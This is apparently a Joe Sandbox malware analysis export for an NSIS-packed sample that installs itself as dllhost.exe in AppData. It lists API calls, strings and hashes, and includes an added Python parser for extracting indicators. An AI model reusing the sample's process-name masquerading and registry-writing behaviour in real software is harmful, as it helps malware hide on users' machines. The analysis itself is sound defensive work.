                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\dllhost.exe,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\dllhost.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                                              • API String ID: 4283519449-3159565494
                                                                              • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                                              • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD

                                                                              Control-flow Graph
                                                                              • Rendered graph image; the executed / not-executed block colouring is lost in the text export. Function entry 0040626E, basic blocks 0040626E to 004064DD; internal calls to 0040611A, 00406193, 0040624C, 0040626E (self) and 004064E0; Win32 calls as listed under APIs below.
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063AF
                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063C2
                                                                              • SHGetFolderPathW.SHELL32(004052E7,00000000,00000000,: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063EA
                                                                              • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000), ref: 004063FE
                                                                              • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 0040640C
                                                                              • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004052E7,Completed,00000000), ref: 00406495
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryFolderPath$FreeFromListLocationSpecialSystemTaskWindowslstrcatlstrlen
                                                                              • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                              • API String ID: 1812420262-905382516
                                                                              • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                              • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                                              • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                              • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E

                                                                              Control-flow Graph
                                                                              • Rendered graph image; the executed / not-executed block colouring is lost in the text export. Function entry 0040176F, basic blocks 0040176F to 00402ACE; internal calls to 00402C37, 004030FA, 004052B0, 004058AE, 00405B1D, 00405B94, 00405D19, 00405D3E, 0040624C, 0040626E, 0040658F and 004064E0. Besides the lstrcatW and CompareFileTime calls listed under APIs below, the graph also contains SetFileTime and CloseHandle blocks that do not appear in that list.
                                                                              APIs
                                                                              • lstrcatW.KERNEL32(00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,?,00000031), ref: 004017B0
                                                                              • CompareFileTime.KERNEL32(-00000014,?,Noncyclical,Noncyclical,00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,?,00000031), ref: 004017D5
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                                • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                                                                • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet$C:\Windows\Intragantes.geo$Noncyclical$sarcoderma
                                                                              • API String ID: 1941528284-2126595995
                                                                              • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                                              • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                                                              • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                                              • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D

                                                                              Control-flow Graph
                                                                              • Rendered graph image; the executed / not-executed block colouring is lost in the text export. Function entry 004052B0, basic blocks 004052B0 to 00405380; one internal call to 0040626E; Win32 calls as listed under APIs below.
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                                                              • SetWindowTextW.USER32(Completed,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID: Completed
                                                                              • API String ID: 2531174081-3087654605
                                                                              • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                              • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                                              • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                              • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68

                                                                              Control-flow Graph
                                                                              • Rendered graph image; the executed / not-executed block colouring is lost in the text export. Function entry 004065B6, basic blocks 004065B6 to 00406623; no internal calls; Win32 calls (GetSystemDirectoryW, wsprintfW, LoadLibraryExW) as listed under APIs below.
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
                                                                              • wsprintfW.USER32 ref: 00406608
                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
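The API lines in these function blocks all have one shape, `<api>.<MODULE>(<args>), ref: <call-site>`, with indented `Part of subcall function <addr>:` lines for callees, and the String ID lines pack a function's strings with `$` separators. The parser below, an added example for this report and not Joe Sandbox code, turns those lines into records, pulls out the string arguments and Windows paths (the IOC-bearing values), and flags the GetSystemDirectoryW followed by LoadLibraryExW with dwFlags 0x8 (LOAD_WITH_ALTERED_SEARCH_PATH) sequence shown in the block just above. The line format is inferred from the lines on this page, so the regular expressions are assumptions; the sample lines are copied verbatim from the blocks above.

```python
"""Parse the "APIs" and "String ID" lines of a Joe Sandbox function block.
Added example for this report, not Joe Sandbox code: the line formats are
inferred from the lines visible on this page, so the regexes are assumptions."""
import re
from dataclasses import dataclass, field
from typing import Optional

# "<api>.<MODULE>(<args>), ref: <addr>" or "<api>.<MODULE> ref: <addr>",
# optionally prefixed with "Part of subcall function <addr>:" (nested lines).
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_ARG = re.compile(r"^-?[0-9A-Fa-f]{8}$")   # 32-bit value as the sandbox logs it
WIN_PATH = re.compile(r"^[A-Za-z]:\\")
LOAD_WITH_ALTERED_SEARCH_PATH = 0x8          # LoadLibraryExW dwFlags bit


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                       # call-site address inside the dumped image
    args: list = field(default_factory=list)
    caller: Optional[int] = None   # only set for "Part of subcall function" lines


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None                # value not recovered by the sandbox
    if HEX_ARG.match(tok):
        return int(tok, 16)        # numeric; a leading '-' is kept as a sign
    return tok                     # resolved string: path, message, window text


def parse_api_line(line: str) -> Optional[ApiCall]:
    """One API line -> ApiCall, or None for any other line.  Arguments are
    split on ',', so a string argument containing a comma would be split too
    (none of the lines in this report do)."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [] if m["args"] is None else [parse_arg(a) for a in m["args"].split(",")]
    caller = int(m["caller"], 16) if m["caller"] else None
    return ApiCall(m["api"], m["module"], int(m["ref"], 16), args, caller)


def parse_block(lines):
    """All API calls of one function block, ordered by call-site address."""
    return sorted((c for c in map(parse_api_line, lines) if c), key=lambda c: c.ref)


def string_args(calls):
    """Deduplicated resolved string arguments: the IOC-bearing values."""
    return sorted({a for c in calls for a in c.args if isinstance(a, str)})


def paths_from_string_id(line: str):
    """Split a '• String ID: a$b$c' line on '$' and keep Windows paths, in order."""
    body = line.split("String ID:", 1)[-1]
    out = []
    for part in body.split("$"):
        part = part.strip().strip('"')
        if WIN_PATH.match(part) and part not in out:
            out.append(part)
    return out


def sysdir_loadlibrary_sites(calls):
    """Refs of LoadLibraryExW calls made with LOAD_WITH_ALTERED_SEARCH_PATH after
    GetSystemDirectoryW in the same block: the full-path DLL load at 0040661C."""
    hits, seen_sysdir = [], False
    for c in calls:                          # already in address order
        if c.api == "GetSystemDirectoryW":
            seen_sysdir = True
        elif c.api == "LoadLibraryExW" and seen_sysdir and len(c.args) > 2:
            if isinstance(c.args[2], int) and c.args[2] & LOAD_WITH_ALTERED_SEARCH_PATH:
                hits.append(c.ref)
    return hits


# Sample input: lines copied verbatim from the blocks above, bullets included.
UXTHEME_BLOCK = [
    r"• GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD",
    r"• wsprintfW.USER32 ref: 00406608",
    r"• LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C",
]
MIXED_LINES = [
    r"• lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D",
    r"  • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259",
    r"• Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af",  # not an API line
]
STRING_ID = (r"• String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117"
             r"\sulfonylurea\Playlet$C:\Windows\Intragantes.geo$Noncyclical$sarcoderma")

if __name__ == "__main__":
    calls = parse_block(UXTHEME_BLOCK + MIXED_LINES)
    for c in calls:
        print(f"{c.ref:08X} {c.module}!{c.api} {c.args} caller={c.caller}")
    print("strings:", string_args(calls))
    print("paths:", paths_from_string_id(STRING_ID))
    print("sysdir LoadLibraryExW at:", [f"{a:08X}" for a in sysdir_loadlibrary_sites(calls)])
```

Feeding a whole report export through `parse_block` per function gives the same API-name set that the Similarity section condenses into its API ID, plus the resolved paths (`C:\Users\user\AppData\Roaming\dllhost.exe`, `C:\Windows\Intragantes.geo`) that are worth turning into host indicators. `sysdir_loadlibrary_sites` only reports the pattern that this sample's NSIS stub exhibits; it does not judge whether the load is safe.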
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-1946221925
                                                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8

                                                                              Control-flow Graph
                                                                              • Rendered graph image; the executed / not-executed block colouring is lost in the text export. Function entry 004030FA, basic blocks 004030FA to 004032DC; internal calls to 004032DF, 004032F5, 004052B0, 00405DF0, 00406787 and 004067A7; Win32 calls (GetTickCount twice, MulDiv, wsprintfW) as listed under APIs below.
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 0040315B
                                                                              • GetTickCount.KERNEL32(0040CEA0,00004000), ref: 004031DC
                                                                              • MulDiv.KERNEL32 ref: 00403209
                                                                              • wsprintfW.USER32 ref: 0040321C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$wsprintf
                                                                              • String ID: ... %d%%
                                                                              • API String ID: 551687249-2449383134
                                                                              • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                                              • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                                              • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                                              • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9

                                                                              Control-flow Graph (function at 0040577f, basic blocks 40577f through 4057f9; graph image)
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                                              • GetLastError.KERNEL32 ref: 004057D6
                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                                              • GetLastError.KERNEL32 ref: 004057F5
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming, xrefs: 0040577F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID: C:\Users\user\AppData\Roaming
                                                                              • API String ID: 3449924974-2707566632
                                                                              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                                              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9

                                                                              Control-flow Graph (function at 00405d6d, basic blocks 405d6d through 405dbf; graph image)
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,?,"C:\Users\user\AppData\Roaming\dllhost.exe" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006), ref: 00405D8B
                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\AppData\Roaming\dllhost.exe" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589), ref: 00405DA6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                              • API String ID: 1716503409-338990885
                                                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64

                                                                              Control-flow Graph (function at 00401c19; graph image)
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                                              • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28

                                                                              Control-flow Graph (function at 004023de; graph image)
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(sarcoderma,00000023,00000011,00000002), ref: 00402429
                                                                              • RegSetValueExW.KERNEL32 ref: 00402469
                                                                              • RegCloseKey.KERNEL32(?), ref: 00402551
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValuelstrlen
                                                                              • String ID: sarcoderma
                                                                              • API String ID: 2655323295-3317469366
                                                                              • Opcode ID: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                                                              • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
